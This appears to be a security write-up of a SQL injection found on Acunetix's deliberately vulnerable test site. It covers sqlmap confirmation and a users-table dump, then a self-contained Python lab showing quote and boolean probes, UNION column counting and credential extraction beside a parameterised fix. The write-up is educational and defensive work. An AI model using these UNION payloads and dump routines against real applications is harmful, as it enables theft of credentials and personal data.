A comprehensive technical walk-through of a successful vulnerability chain discovery and data exfiltration.
This repository documents a complete end-to-end security audit. Using proprietary automation (Bubble-Scanner), I identified a critical SQL injection (SQLi) vulnerability in a web application served by Nginx 1.19.0 on PHP 5.6.40. The vulnerability allowed unauthorized read access to the backend database, leading to the exfiltration of the entire users table, including plaintext credentials and sensitive PII.
The exploitation lifecycle began with a scan using Bubble-Scanner. The scanner's event-driven engine identified a hidden endpoint and immediately flagged a potential SQLi vulnerability: injecting a single quote ('), the SQL string delimiter, produced a backend syntax error in the response. A quote-induced error is a strong indicator but not proof on its own, which is why the finding was confirmed with sqlmap in the next step.
- Scan Start: Tue Feb 17 01:14:11 PM EST 2026
- Target: http://testphp.vulnweb.com
- Finding: [!!!] SQLi VULNERABILITY DETECTED
Following discovery, sqlmap was used to confirm the injection point on the cat parameter of the listproducts.php endpoint. sqlmap's fingerprint and the injection techniques it confirmed:
- Back-end DBMS: MySQL >= 5.6
- Operating System: Linux Ubuntu
- Injection Types Identified:
  - Boolean-based blind: AND boolean-based blind - WHERE or HAVING clause
  - Error-based: MySQL >= 5.6 AND error-based
  - Time-based blind: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  - UNION query: Generic UNION query (NULL) - 11 columns
Four independent techniques confirming the same parameter rule out a false positive from the quote probe. The UNION finding (the original SELECT returns 11 columns) is what makes a direct dump possible without slow, blind row-by-row extraction.
The vulnerability provided full read access to the database layout. Enumerating the available databases returned two:
- acuart
- information_schema
The application's data lives in acuart; information_schema is MySQL's built-in metadata catalogue, which is what sqlmap reads to map the tables and columns of the other databases.
The acuart.users table was found to contain 8 critical columns, including uname (Username), pass (Password), email, and cc (Credit Card / Sensitive Data).
Final exfiltration demonstrated a complete breach of confidentiality. I successfully dumped records from the users table, revealing insecure data storage practices (passwords stored in plaintext). Sample record:
- Username: test
- Password: test
- Email: you
- Notes: Includes stored XSS vectors such as <script>window.location=...</script>
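The following is an added example, not code from this repository, from Bubble-Scanner or from sqlmap. It is a constructed, self-contained Python lab that reproduces the three steps documented above (quote and boolean probing, UNION column-count discovery, dumping users through the UNION) against an in-memory SQLite database instead of the real MySQL target. The products and users tables, their sample rows, the three-column listproducts-style query (the real target returned 11 columns), the MySQL-style error string and the marker value are all assumptions made for the example. The hardened function beside the vulnerable one shows the fix: validate the type and bind the value, after which none of the probes produce a signal.

```python
"""Constructed SQL-injection lab: a listproducts-style endpoint backed by an
in-memory SQLite database, in a vulnerable and a hardened form, plus the
probes a scanner uses to flag the bug and the UNION technique used to dump it."""
import re
import sqlite3
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample data; the plaintext password mirrors the finding above.
SCHEMA = [
    "CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER)",
    "CREATE TABLE users (uname TEXT, pass TEXT, email TEXT, cc TEXT)",
    "INSERT INTO products VALUES (1, 'poster', 1), (2, 'mug', 1), (3, 'shirt', 2)",
    "INSERT INTO users VALUES ('test', 'test', 'you@example.invalid', '4111-xxxx')",
]
# Constructed stand-in for MySQL's error text; SQLite's own wording differs.
ERROR_PAGE = "Error: You have an error in your SQL syntax"
MYSQL_ERROR_RE = re.compile(r"You have an error in your SQL syntax", re.I)
MARKER = "7f3a9c"  # constructed tag; sqlmap injects random strings the same way

App = Callable[[str], str]  # takes the raw ?cat= value, returns the page body


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    for stmt in SCHEMA:
        con.execute(stmt)
    return con


def _render(rows: List[Tuple]) -> str:
    return "\n".join("|".join(str(c) for c in r) for r in rows) or "No products found"


def vulnerable_listproducts(cat: str) -> str:
    """The bug class on the page: the parameter is concatenated into the SQL text."""
    try:
        rows = _db().execute(f"SELECT id, name, cat FROM products WHERE cat={cat}").fetchall()
    except sqlite3.Error:
        return ERROR_PAGE
    return _render(rows)


def safe_listproducts(cat: str) -> str:
    """Hardened form: validate the type, then bind the value as a parameter."""
    if not cat.lstrip("-").isdigit():
        return "Invalid category"
    rows = _db().execute("SELECT id, name, cat FROM products WHERE cat=?", (int(cat),)).fetchall()
    return _render(rows)


def probe(app: App, baseline: str = "1") -> Dict[str, bool]:
    """The two cheap checks a scanner runs: does a lone quote break the query, and
    does a true/false boolean pair change the page? Both are judged against the
    unmodified request so that a page which always errors is not flagged."""
    base = app(baseline)
    quote = app(baseline + "'")
    true_page = app(baseline + " AND 1=1")
    false_page = app(baseline + " AND 1=2")
    return {
        "error_based": bool(MYSQL_ERROR_RE.search(quote)) and not MYSQL_ERROR_RE.search(base),
        "boolean_based": true_page == base and false_page != base,
    }


def find_union_columns(app: App, max_cols: int = 20) -> Optional[int]:
    """Widen a UNION SELECT of marker strings until the DBMS accepts it; the first
    width whose marker reaches the page is the column count of the original query."""
    for n in range(1, max_cols + 1):
        cols = ",".join([f"'{MARKER}'"] * n)
        if MARKER in app(f"-1 UNION SELECT {cols}"):
            return n
    return None


def dump_users(app: App, ncols: int) -> List[Tuple[str, str, str]]:
    """Pull uname/pass/email through the UNION, padding with NULLs to the found width."""
    if ncols < 3:
        raise ValueError("need at least three columns to dump three fields")
    cols = ["uname", "pass", "email"] + ["NULL"] * (ncols - 3)
    body = app("-1 UNION SELECT " + ",".join(cols) + " FROM users")
    return [tuple(line.split("|")[:3]) for line in body.splitlines()]


if __name__ == "__main__":
    for name, app in (("vulnerable", vulnerable_listproducts), ("hardened", safe_listproducts)):
        print(name, probe(app))
    width = find_union_columns(vulnerable_listproducts)
    print("UNION width:", width, "users:", dump_users(vulnerable_listproducts, width))
```

Against the vulnerable endpoint the probe reports both error-based and boolean-based signals, the UNION width comes out as 3 (11 on the real target), and the users row is returned in a single request; against the hardened endpoint every probe returns either the baseline page or "Invalid category", so nothing is flagged. The marker-string approach for counting columns is preferred over counting until the error disappears because a parameterised endpoint never errors and would otherwise look like a one-column UNION.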
The successful exploitation of this vulnerability represents a Critical Risk to the confidentiality of user data and to every account in the application.
- Mass Data Exfiltration: Unauthorized read access to PII and credentials constitutes a major security breach; with a UNION-based injection a single request returns whole tables, so no slow blind extraction is needed.
- Account Takeover (ATO): Access to plaintext passwords allows immediate account compromise. Passwords should be stored only as salted, slow hashes (for example bcrypt or Argon2) so that a dump of this table does not yield working credentials.
- Persistent Threat Vector: Stored XSS vectors identified in the database dump indicate a secondary attack surface for session hijacking wherever those fields are rendered without output encoding.
- Legacy Risk: PHP 5.6 reached end of life in December 2018 and no longer receives security fixes, so the stack remains exposed to publicly known vulnerabilities even once the SQLi is fixed.
This documentation is for educational and ethical security testing only. All screenshots and data were gathered from testphp.vulnweb.com, Acunetix's public, intentionally vulnerable test application, which is provided for exactly this kind of legally authorized vulnerability testing.